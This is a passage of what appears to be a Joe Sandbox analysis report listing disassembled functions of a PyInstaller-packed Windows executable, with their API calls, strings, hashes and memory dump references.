Opcode ID: bc3b6ad1d72ad9a9067b3a27b155e00267b771eeaeabf2a6be8fdbbb9eca8f82
Instruction ID: 9fd49d4c37a0bdb35a722818300c5b6cbf9a551bb22c82d0cf9a393ea00ed500
Opcode Fuzzy Hash: bc3b6ad1d72ad9a9067b3a27b155e00267b771eeaeabf2a6be8fdbbb9eca8f82
Instruction Fuzzy Hash: 9B51BD21B0C64392EE20AB12EC611B9A390BF80794F444135EE0C97B96DF7EF555AB43

Function 00007FF626648850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF626643CBB), ref: 00007FF6266488F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF626643CBB), ref: 00007FF6266488FA
CreateDirectoryW.KERNELBASE(?,00000000,00007FF626643CBB), ref: 00007FF62664893C

Part of subcall function 00007FF626648A20: GetEnvironmentVariableW.KERNEL32(00007FF62664388E), ref: 00007FF626648A57
Part of subcall function 00007FF626648A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF626648A79

Part of subcall function 00007FF6266582A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6266582C1

Part of subcall function 00007FF626642810: MessageBoxW.USER32 ref: 00007FF6266428EA

Strings

LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF62664896E
TMP, xrefs: 00007FF6266488B2
TMP, xrefs: 00007FF62664888C, 00007FF626648993
_MEI%d, xrefs: 00007FF626648902
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6266488CC

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction ID: d1c2097c09a65ae52e3de87895b7cb93a422814bcefb53fe74365e0db9a5539d
Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction Fuzzy Hash: FF41A221A19A8354FE20AB66AC662B91391BF857C4F400135ED0DC77D6DE7EE504EB03

Function 00007FF626641210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.3.1, xrefs: 00007FF626641249
malloc, xrefs: 00007FF6266412C1, 00007FF6266412F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF62664141E
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6266412BA
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF626641276
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6266412EF

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
Instruction ID: 515ac213b7c1416dcf2ad6108da10ef69b9e6f03d4c0f8439df40bd4a45c629f
Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
Instruction Fuzzy Hash: 2951D622A0864281EE709B16EC603BAA691FF85794F444131ED4DD7BC6EF7EE541EB03

Function 00007FF62665ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF62665F11A,?,?,-00000018,00007FF62665ADC3,?,?,?,00007FF62665ACBA,?,?,?,00007FF626655FAE), ref: 00007FF62665EEFC
GetProcAddress.KERNEL32(?,?,?,00007FF62665F11A,?,?,-00000018,00007FF62665ADC3,?,?,?,00007FF62665ACBA,?,?,?,00007FF626655FAE), ref: 00007FF62665EF08

Strings

ext-ms-, xrefs: 00007FF62665EE59
api-ms-, xrefs: 00007FF62665EE46

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: eefb4ea9b3849d784e0029f3cee8cd32d2a6c79f7804c6edab273b240fc2dec5
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: D9414321B28A5281FF16CB52AC456752391BF49BD0F884139EC1DCB385EF3EE405AB83

Function 00007FF6266436B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF626643804), ref: 00007FF6266436E1
GetLastError.KERNEL32(?,00007FF626643804), ref: 00007FF6266436EB

Part of subcall function 00007FF626642C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642C9E
Part of subcall function 00007FF626642C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642D63
Part of subcall function 00007FF626642C50: MessageBoxW.USER32 ref: 00007FF626642D99

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF626643790
Failed to obtain executable path., xrefs: 00007FF6266436F3
\\?\, xrefs: 00007FF62664375A
GetModuleFileNameW, xrefs: 00007FF6266436FA
Failed to resolve full path to executable %ls., xrefs: 00007FF626643739

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: 45570c8619e57c85d043a01ff9e3b1bf66a306f24de0ca0e2fbf7e7fec32540f
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: 47217E61B1C643D1FE30AB21FC603BA2251BF88344F404232D59DC26D5EE6EE504AB47

Function 00007FF62665BACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665BEF9

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction ID: 7140218179b5e8749c6ea5133099ebce6bead08841de322266866f34a0a55e88
Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction Fuzzy Hash: 48C1C7A290C68781EF609B1598522BD7764FB81BC0F594131EA4E837D3CF7EE855AB03

Function 00007FF626648760 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF626648780
OpenProcessToken.ADVAPI32 ref: 00007FF626648793
GetTokenInformation.KERNELBASE ref: 00007FF6266487B8
GetLastError.KERNEL32 ref: 00007FF6266487C2
GetTokenInformation.KERNELBASE ref: 00007FF626648802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62664881E
CloseHandle.KERNEL32 ref: 00007FF626648836

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction ID: 71a3e350bc318ab344050ccc4a8136ee90ffad9eb8f84e3045c560a7cf2206e8
Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction Fuzzy Hash: BA215831A0C68395DF109B59B854169A7A0FFC57A0F100235D66D83AE4DEADD4549F43

Function 00007FF6266490E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF626648760: GetCurrentProcess.KERNEL32 ref: 00007FF626648780
Part of subcall function 00007FF626648760: OpenProcessToken.ADVAPI32 ref: 00007FF626648793
Part of subcall function 00007FF626648760: GetTokenInformation.KERNELBASE ref: 00007FF6266487B8
Part of subcall function 00007FF626648760: GetLastError.KERNEL32 ref: 00007FF6266487C2
Part of subcall function 00007FF626648760: GetTokenInformation.KERNELBASE ref: 00007FF626648802
Part of subcall function 00007FF626648760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62664881E
Part of subcall function 00007FF626648760: CloseHandle.KERNEL32 ref: 00007FF626648836

LocalFree.KERNEL32(?,00007FF626643C55), ref: 00007FF62664916C
LocalFree.KERNEL32(?,00007FF626643C55), ref: 00007FF626649175

Strings

D:(A;;FA;;;%s), xrefs: 00007FF626649157
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF626649142
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF626649183
S-1-3-4, xrefs: 00007FF626649121

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction ID: 9aee3baf377f608468a8f842ebd0bd00518453cfd8b55bb820aefac7871e31fc
Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction Fuzzy Hash: AD214F31A0874282EE24AB11ED253EA6365FF84780F444135EA4DD3796DF7EE845EB43

Function 00007FF62665CFD0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62665CFBB), ref: 00007FF62665D0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62665CFBB), ref: 00007FF62665D177

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: c47d77fa4b4835e9aa27897f6ed74f9962e318b048ebcc3636f6b5a1fb7d199d
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: 6191E832F1865295FF609F659C4127D2BA0BB40B88F144139DE0E976D6CE3ED482EB07

Function 00007FF626655698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266556C5
CreateFileW.KERNELBASE ref: 00007FF626655704
CloseHandle.KERNEL32 ref: 00007FF626655739

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: b669968a294d62a610042981cd76d72068ba7b7358f279315f5ff6592d131470
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: 3841B222D2878283EB109B2199553797360FB947A4F108334EA9C43AD2DF7DB5E09B03

Function 00007FF62664CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF62664CE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF62664CE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF62664CCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF62664CD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF62664CD91

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: 5070e567eb79f1ce9303508210198623c0d947ba0dee6997caae636c2699bd51
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 3E314E20E4868385FE74AB249C723B92792BF41784F444435D94DC73D7DEAEA405EB63

Function 00007FF626659AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF626659A9C), ref: 00007FF626659AB1
TerminateProcess.KERNEL32(?,?,?,00007FF626659A9C), ref: 00007FF626659ABC
ExitProcess.KERNEL32 ref: 00007FF626659ACB

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction ID: 3abae8f2dcad9af8ec1292d50d522cb38583912be5a295fadbc7109897234849
Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction Fuzzy Hash: E1D09224F18787A3EF183B706C9A27812517F48B41F142538D80B9A393ED2EA859AB13

Function 00007FF6266501AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266501F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266502E7

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 99fa2097cb86ae68a8387e59ae44a807796e822b2923f7a129008aa34f269cf6
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: 2151D671A096D286EE249A659C0277A7291BF84BA4F144734DD6C877C7CF3ED401AF03

Function 00007FF62665C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF62665C33D), ref: 00007FF62665C1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF62665C33D), ref: 00007FF62665C1FA

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: aa83118576ff7483c60f9ce2848cdab35300d89d2794ca886ea1c8054ce5c15b
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: B9112361708A8281DF208B25BC041696362BB81BF0F540335EE7D8BBEACF3DD0119B03

Function 00007FF62665A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: 822bb9ffbdabdf6e7b509b442c86d2c31bd36f5bb3d1eb928ac2316602c99e37
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: 0DE04610F1820382FF08ABB2AC5613812607F88B40F040034D81DE22A2EE2F6899AB03

Function 00007FF62665ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF62665AA45,?,?,00000000,00007FF62665AAFA), ref: 00007FF62665AC36
GetLastError.KERNEL32(?,?,?,00007FF62665AA45,?,?,00000000,00007FF62665AAFA), ref: 00007FF62665AC40

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: b211dc0fbf423a356ea9c4b272d5ebd346eedddadc35f718031d43862950b4f7
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: CA218411B1C64342EF945761AC9627D1682BF84790F084239D91EC77D3CE6FA449AB43

Function 00007FF62665BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665BF44

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
